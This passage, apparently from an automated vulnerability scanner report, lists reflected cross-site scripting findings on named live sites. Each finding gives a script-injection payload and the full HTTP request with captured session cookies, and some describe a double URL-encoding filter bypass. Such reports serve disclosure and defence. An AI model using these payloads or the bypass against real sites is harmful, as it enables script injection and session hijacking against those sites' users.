Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=cd0ed"><script>alert(1)</script>3940b74ef04&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the gotopage request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 25492'onerror%3d'alert(1)'4929c58198 was submitted in the gotopage parameter. This input was echoed as 25492'onerror='alert(1)'4929c58198 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/25492'onerror%3d'alert(1)'4929c58198 HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 404 Not Found Cache-Control: private Content-Type: text/html Expires: Sat, 03 May 2008 14:17:16 GMT Server: Microsoft-IIS/7.0 Set-Cookie: ix=k; path=/ Set-Cookie: ies=3hJF2uAprPZVGf42Zwr0ekr2sY1ahZftnoTx9yuEyyIqvJvUlzC7C5ClUj1mImMy0aC%2BOSFmyeUpZNslxkObl7I0cWS0PuZU%2FREf%2ByHeMVk%3D; path=/ Set-Cookie: ASPSESSIONIDSSRTQCRC=GFLJMIMAIHNDHDFGKCOMPNDP; path=/ X-Powered-By: web13 Date: Fri, 28 Jan 2011 14:17:17 GMT Connection: close Content-Length: 8313 Set-Cookie: BIGipServerlanguage.imlive.com=655623746.20480.0000; path=/
<HTML> <HEAD> <meta name=vs_targetSchema content="http://schemas.microsoft.com/intellisense/ie5"> <title>ImLive.com - Page Not Found</title>
The value of the promocode request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acb36"><script>alert(1)</script>678c2c2a5a9 was submitted in the promocode parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /waccess/?wid=124669500825&promocode=YZSUSA5583acb36"><script>alert(1)</script>678c2c2a5a9&cbname=&from=&trdlvlcbid=0&linkcode=701&gotopage=/webcam-login/ HTTP/1.1 Host: es.imlive.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: spvdr=vd=aa335a1d-f2f7-42c6-a85e-b224ba42f94d&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerlanguage.imlive.com=2215904834.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; __utmc=71081352; ASP.NET_SessionId=yuc0syrc5s1q0i45cv4nlr2r; ies=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9EdgKKcLsjMr%2bP%2fF7NMeHCw%3d%3d;
The value of the uid request parameter is copied into the HTML document as plain text between tags. The payload ddf3f<script>alert(1)</script>ed09fa2b95 was submitted in the uid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.soundingsonline.com%2Fnews%2Fmishaps-a-rescues%2F272642-mishaps-a-rescues-connecticut-and-new-york-jan%3F'%2522--%253E%253C%2Fstyle%253E%253C%2Fscript%253E%253Cscript%253Ealert(0x00241B)%253C%2Fscript%253E&uid=7hSy8PbjRnOXSf2i_40364845ddf3f<script>alert(1)</script>ed09fa2b95&xy=104%2C60&wh=1155%2C1012&vchannel=bzo.847.CD39C435!&cid=5196052&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.1&iframed=0 HTTP/1.1 Host: event.adxpose.com Proxy-Connection: keep-alive Referer: http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x00241B)%3C/script%3E Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Set-Cookie: JSESSIONID=BAA0A4E3D8DA072903C9105A9AD18668; Path=/ Cache-Control: no-store Content-Type: text/javascript;charset=UTF-8 Content-Length: 146 Date: Fri, 28 Jan 2011 16:42:08 GMT Connection: close
if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("7hSy8PbjRnOXSf2i_40364845ddf3f<script>alert(1)</script>ed09fa2b95");
The value of the 376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cd3fe"><script>alert(1)</script>4fe2eb96fc6 was submitted in the 376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1cd3fe"><script>alert(1)</script>4fe2eb96fc6 HTTP/1.1 Host: events.cbs6albany.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the 376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 388f4"><script>alert(1)</script>42460964186 was submitted in the 376e5%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea7771aeaee3 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the 376e5%22%3e%3cscript%3ealert(1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d58b9"><script>alert(1)</script>83d0d4a44c4 was submitted in the 376e5%22%3e%3cscript%3ealert(1 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?376e5%22%3e%3cscript%3ealert(1d58b9"><script>alert(1)</script>83d0d4a44c4 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?376e5%22%3e%3cscript%3ealert(1d58b9"><script>alert(1)</script>83d0d4a44c4" /> ...[SNIP]...
4.407. http://events.cbs6albany.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd942"><script>alert(1)</script>22ceebdf215 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1&bd942"><script>alert(1)</script>22ceebdf215=1 HTTP/1.1 Host: events.cbs6albany.com Proxy-Connection: keep-alive Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1&bd942"><script>alert(1)</script>22ceebdf215=1" /> ...[SNIP]...
4.408. http://events.cbs6albany.com/albany-ny/events [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/albany-ny/events
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cb0aa"><script>alert(1)</script>32bdd3a6cef was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-ny/events?cb0aa"><script>alert(1)</script>32bdd3a6cef=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv ...[SNIP]... <meta property="og:url" content="http://www.zvents.com/albany-ny/events?cb0aa"><script>alert(1)</script>32bdd3a6cef=1" /> ...[SNIP]...
4.409. http://events.cbs6albany.com/albany-ny/events/business+tech [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/albany-ny/events/business+tech
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 578e3"><script>alert(1)</script>09fec9f16b2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-ny/events/business+tech?578e3"><script>alert(1)</script>09fec9f16b2=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f39fa"><a>eda79b0a89f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /albany-nyf39fa"><a>eda79b0a89f/events/performing+arts HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9b91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bb2d08bb55 was submitted in the REST URL parameter 3. This input was echoed as e9b91"><script>alert(1)</script>5bb2d08bb55 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albany-ny/events/performing+artse9b91%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5bb2d08bb55 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload a1daa%253cscript%253ealert%25281%2529%253c%252fscript%253ef524f3c9c61 was submitted in the REST URL parameter 3. This input was echoed as a1daa<script>alert(1)</script>f524f3c9c61 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /albany-ny/events/performing+artsa1daa%253cscript%253ealert%25281%2529%253c%252fscript%253ef524f3c9c61 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
4.413. http://events.cbs6albany.com/albany-ny/events/performing+arts [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://events.cbs6albany.com
Path:
/albany-ny/events/performing+arts
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fbbe"><script>alert(1)</script>0379cee7c4e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /albany-ny/events/performing+arts?3fbbe"><script>alert(1)</script>0379cee7c4e=1 HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dc9ca"><a>b614a586adb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /albany-nydc9ca"><a>b614a586adb/events/visual+arts HTTP/1.1 Host: events.cbs6albany.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; zvents_tracker_sid=Xu3uTnqUd1-EIF3JztHR7Q.100025220; Zvents=fnr9vfxsab; _zsess=BAh7BzoPc2Vzc2lvbl9pZCIlNDRlZTQ0ZTQ4YmJlY2MxYjE3MWUzMzFkZGYyMjZkMTQiDWxvY2F0aW9uexAiC3JhZGl1c2k3IgljaXR5IgtBbGJhbnkiCmVycm9yRiINbGF0aXR1ZGVmGjQyLjY1MTY5OTk5OTk5OTk5OABmzyINdGltZXpvbmUiFUFtZXJpY2EvTmV3X1lvcmsiE2Rpc3BsYXlfc3RyaW5nIg9BbGJhbnksIE5ZIhJkaXN0YW5jZV91bml0IgptaWxlcyIMY291bnRyeSISVW5pdGVkIFN0YXRlcyIObG9uZ2l0dWRlZhstNzMuNzU1MDk5OTk5OTk5OTk5AE1qIhF3aGVyZV9zdHJpbmdAEiIKc3RhdGUiB05Z--d46beea16341a8ef3f3ec7665c09cc3c76466675; s_nr=1296236252424; welcome=Xu3uTnqUd1-EIF3JztHR7Q.100025220; __qca=P0-387650238-1296236241942; SC_LINKS=%5B%5BB%5D%5D; cf=2; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 228be%253cscript%253ealert%25281%2529%253c%252fscript%253e32854513461 was submitted in the REST URL parameter 3. This input was echoed as 228be<script>alert(1)</script>32854513461 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
